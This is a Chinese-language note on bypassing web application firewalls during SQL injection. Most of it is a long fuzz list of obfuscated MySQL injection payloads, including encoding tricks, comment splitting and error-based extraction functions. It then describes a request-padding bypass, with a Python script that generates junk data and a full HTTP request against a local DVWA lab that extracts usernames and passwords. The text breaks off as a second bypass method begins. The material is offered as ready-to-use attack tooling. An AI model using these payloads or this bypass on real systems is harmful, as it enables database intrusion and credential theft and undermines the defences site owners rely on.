​注入waf字典fuzz

​如果目标站点支持https尽量用https进行突破。

注入bypass fuzz waf  


'
--
' order/*/*/by/**/1--+
' order/**/by 1 --+
!
"
"%20and%20"1"="1
"%20and%20"1"="2
"%20OR%20"1"="1
"%20OR%20"1"="2
#
%
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
%09union%09select 1,2
%0a
%0A%20
%0aunion%0aselect 1,2
%0b
%0baunion%0bselect 1,2
%0c
%0caunion%0cselect 1,2
%0d
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%20
'%20and%20'1'='1
'%20and%20'1'='2
'%20OR%20'1'='1
'%20OR%201=1--%20-
'%20OR%20'1'='2
'%20OR%201=2--%20-
%22
%23
%23%0afrom
%23?%0auion%20?%23?%0aselect
%23?%0auion%20?%23?%0aselect   
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%252f%252a*/union%252f%252a /select%252f%252a*/ 
%26 1=1
%26 1=2
%26 hex(0)
%26 hex(1)
%27
%2d%2d%0afrom
%2d%2d%0from
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect 
%2f**%2funion%2f**%2fselect%2f**%2f
%2f**%2funion%2f**%2fselect%2f**%2f 
%53eLEct
%55nion %53eLEct
%55nion %53eLEct   
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect 1,2,3)-- - 
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
%a0
%a0from
%df
%u0066rom
&
&&
&& 1=1
&& 1=2
(
(information_schema.schemata)
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
)
)%20and%20(1=1
')%20and%20('1'='1
)%20and%20(1=2
')%20and%20('1'='2
)%20OR%20(1=1
')%20OR%20('1'='1
)%20OR%20(1=2
')%20OR%20('1'='2
)%20OR%201=1--%20-
')%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=2--%20-
*
*/*
*9e0UnIoN
*9e0UnIoN*9e0slect
,
.
/
/%23A%0a/
/%2A%2A/union/%2A%2A/select/%2A%2A/
/&id=1308%20order%20by%2035&b=/
/*
/* */union/* */select/ */1,2;
/*!%23/*%0afrom*/
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/ 
/*!00000%23/*%0afrom*/
/*!10440union%0aselect*/
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000UniON SeLeCt*/ 
/*!50000union*//*!50000select*/1,2
/*!5000updatexml*/(1,1,1)
/*!from*/
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!u%6eion*/ /*!se%6cect*/ 
/*!uNIOn*/ /*!SelECt*/
/*!uNIOn*/ /*!SelECt*/ 
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!union*/+/*!select*/ 
/*!UnIoN*/SeLecT+
/*!UnIoN*/SeLecT+  
/**/
/**//*!12345UNION SELECT*//**/
/**//*!12345UNION SELECT*//**/ 
/**//*!50000UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/ 
/**//*!union*//**//*!select*//**/
/**//*!union*//**//*!select*//**/ 
/**/UNION/**//*!50000SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/ 
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**/union/**/select/**/ 
/*--*/union/*--*/select/*--*/ 
/**_**/UnIoN(/*!50000SeLeCt*/
/*xxx*/()
/*中文*/union/*中文*/select/*中文*/1,2;
//
//*
;
@
@;
\'
\\
\Nfrom
\Nselect
\Nunion
^
`
`information_schema`.`schemata`
`information_schema`.schemata
`updatexml`(1,(select @@version),1)
`users`
|
||
|| 1=0
|| 1=1
'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
~
-~
+
--+
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt 
+#uNiOn+#sEleCt
+#uNiOn+#sEleCt 
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+or+0x3a!=1--+
+or+0x3a=1--+
+un/**/ion+se/**/lect
+un/**/ion+se/**/lect 
+uni%0bon+se%0blect+
+uni%0bon+se%0blect+ 
+UnIOn%0d%0aSeleCt%0d%0a
+UnIOn%0d%0aSeleCt%0d%0a 
+union+distinct+select+
+union+distinct+select+ 
+union+distinctROW+select+
+union+distinctROW+select+ 
+UNunionION+SEselectLECT+
+UNunionION+SEselectLECT+ 
<
<>
=
>
1' order--%0aby--%0a1--%0a--+
'1'='1
1efrom
2.0 from
8e0from
ADD
admin'
admin.users
admin+.user
all
alter
anandd
AND
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and -1=-1
and 1=2
and -2<-1
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
'and extractvalue/*/676*/(1,concat(0x7e,database/*/387*/(),x07e))--+
and hex()
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and%201=1
and%201=2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
and/*@%$^(*/ 1=1
and+0x3a!=info()--
as
ascii
Ascii(1)
ASSIC
atan()
BEFORE
benchmark
benchmark()
bin
BY
case
CAST
CAST()
ceil()
ceiling()
char
CHAR(102, 114, 111, 109)
Char(49)
Char('97')
col_name()
COLUMN
CONCAT
concat()
concat(version(),'|',user());
concat_ws
concat_ws()
concat_ws('|',1,2,3)
convert()
COUNT
CREATE
CURSOR
database
database /*//--/*/ ()
database%23x%0A()
database()
database()||’
database/*!20553()*/
database/*!20553()*/--+
database/**/()
database/*///-*/()
database/*/11111*/()
database/*xxx*/()
database+()
DATABASES
db_name()
delete
drop
e0FrOm
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
else
END
exec
exp()
extracavalue()
extractvalue
floor
floor()
for
format
FrOFrOmm
FrOm
from/*!%23/*%0ainformation_schema.tables*/
from/*!--+/*%0ainformation_schema.columns*/
from/*!--+/*%0ainformation_schema.tables*/
from/*!information_schema.tables*/
GeometryCollection
greatest()
GROUP
group by 1
group_concat
handler
HAS_DBACCESS()
having
hex
Hex('a')
hex(user/**/(/**/))
id =1' and 1=1 --+
id =1' and 1=2 --+
id =1' or '1'='1
id=1' || '1'='1
id=-1' like "[%23]" /*!10440union select*/ 1,2,3 --+
id=1' or 1=1#
IF
in
INFILE
INFORMATION
Information_schema./**_**/Tables
information_schema.`schemata`
information_schema.tables
information_schema/**/.schemata
infromation_schema
insert
inset
instr
INTO
into @a,@b,@c,@d;
IS_MEMBER()
IS_SRVROLEMEMBER()
JOIN
LEAVE
left
Left(@@version,1)
Left(version(),1)
Length
LEVEL
like
like "[%23]" /*!10440union select*/
like["%23"]
LIMIT
limit 1 offset 0
Lpad(version(),1,1)
mid
mid()substring()
mid(version() from 1 for 1)
Mid(version(),1,1)
MultiLineString
MultiPoint
NAMES
NEXT
NULL
null+UNION+SELECT+1,2
object_id()
OF
ON
oorr
OR
or 1=0
or 1=1
OR%201=1
OR%201=2
ORD
order
order /*//--/*/ by
order aby
order by
order by 1
order--%0aby
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
OUTFILE
Polygon
prepare
procedure analyse()
rand()
REGEXP
RENAME
REPLACE
REVERSE
REVERSE(noinu)+REVERSE(tceles)
REVERSE(noinu)+REVERSE(tceles) 
reverse(right(reverse(version()),1)
right
Right(@@version,1)
RLIKE
Rpad(version(),1,1)
s%u0065lect
s%u006c%u0006ect
s%u00f0lect
SCHEMA
se%0blect
sel%e%ct
sele%ct
sele/**/ct
SeleCt
select * from user where username in('user');
select * from user where username like 'user';
select * from user where username='user';
select union select{x 1},
select(1)from
select{x user}from{x mysql.user};
SEPARATOR
SET
SHOW
sign()
sleep
sleep()
SQL
sqrt()
substr()
Substr(version(),1,1)
substring
Substring(@@version,1,1)
Substring(version(),1,1)
sys schemma
sys.schema_table_statistics_with_buffer
TABLE
TABLE_SCHEMA
tan()
THEN
TRUE
u%6eion s%65lect
u%6eion se%6cect
u%6eion se%6cect   
un?+un/**/ion+se/**/lect+
Unhex(61)
uni%0bon+se%0blect
uni%0bon+se%0blect 
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e %73elect   
unio%6e%20%64istinc%74%20%73elect
unio%6e%20%64istinc%74%20%73elect   
UNioN
union   /*!00000%23%0aselect*/
union  -- 1%0a select
union  -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (/*!/**/ SeleCT */ 1,2,3) 
union (select)
union /*!50000%53elect*/
union /*!50000%53elect*/ 
union /*//--/*/ select
union /*@%$^(*/ select 
union /*@%$^(*/ select --+
union all %u0053elect
union all select
union all select 1,2
union all%23%0a select
union distinct
union DISTINCT select
union DISTINCT select 1,2
union distinctrow
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20%64istinctRO%57%20select   
union%20/*!44509select*/%20
union%2053elect
union%2053elect   
union%20all%23%0a%20select%20
union%20distinct%20select
union%20distinct%20select   
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 
union%250Cselect
union%25A0select
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
UNION/*&test=1*/SELECT/*&pwn=2*/ 
union/*&username=*/select
union/**/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//--**/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
union/aaaa%01bbs/select
union/aaaaaaaaaaaaaaaaaaaaaaa/select
union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
UNiOn--+%02%0d%0aselect    
union+/*!select*/
union+/*!select*/ 
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
UPDATE
updatexml
updatexml()
user
user()
user/**/()--+
users
USING
VALUE
VALUES
VARCHAR
VERSION
when
WHERE
xor

绕过方式1:超大数据包绕过(mysql)
假如HTTP请求POST BODY太大,检测所有内容,WAF集群消耗太多的CPU、内存资源。因此许多WAF只检测前面的2M或4M的内容。对于攻击者而言,只需要在POST BODY前面添加许多无用的数据,把攻击的payload放在最后即可绕过WAF检测。
绕过技巧:•GET型请求转POST型•Content-Length头长度大于8200•正常参数在脏数据后面,否则无效

zangshuju.py

#coding=utf-8
import random,string
import sys
from urllib import parse

varname_min = 5
varname_max = 15
data_min = 20
data_max = 30
num_min = 1
num_max = int(sys.argv[1])
def randstr(length):
    str_list = [random.choice(string.ascii_letters) for i in range(length)]
    random_str = ''.join(str_list)
    return random_str

def main():
    data={}
    for i in range(num_min,num_max):
        data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))
    print('&'+parse.urlencode(data)+'&')

main()

POST /dvwa/vulnerabilities/sqli/?Submit=Submit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8200
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit
Cookie: security=low; ECS[visit_times]=1; PHPSESSID=90a4331de18bcd32ee2d780254f44589
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

a=/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBB&id=1' union select null,concat_ws(char(32,58,32),user,password) from users%23

绕过方式2:函数分隔符绕过(mysql)
规则缺陷/特性:函数与括号之间插入分隔符可以正常执行
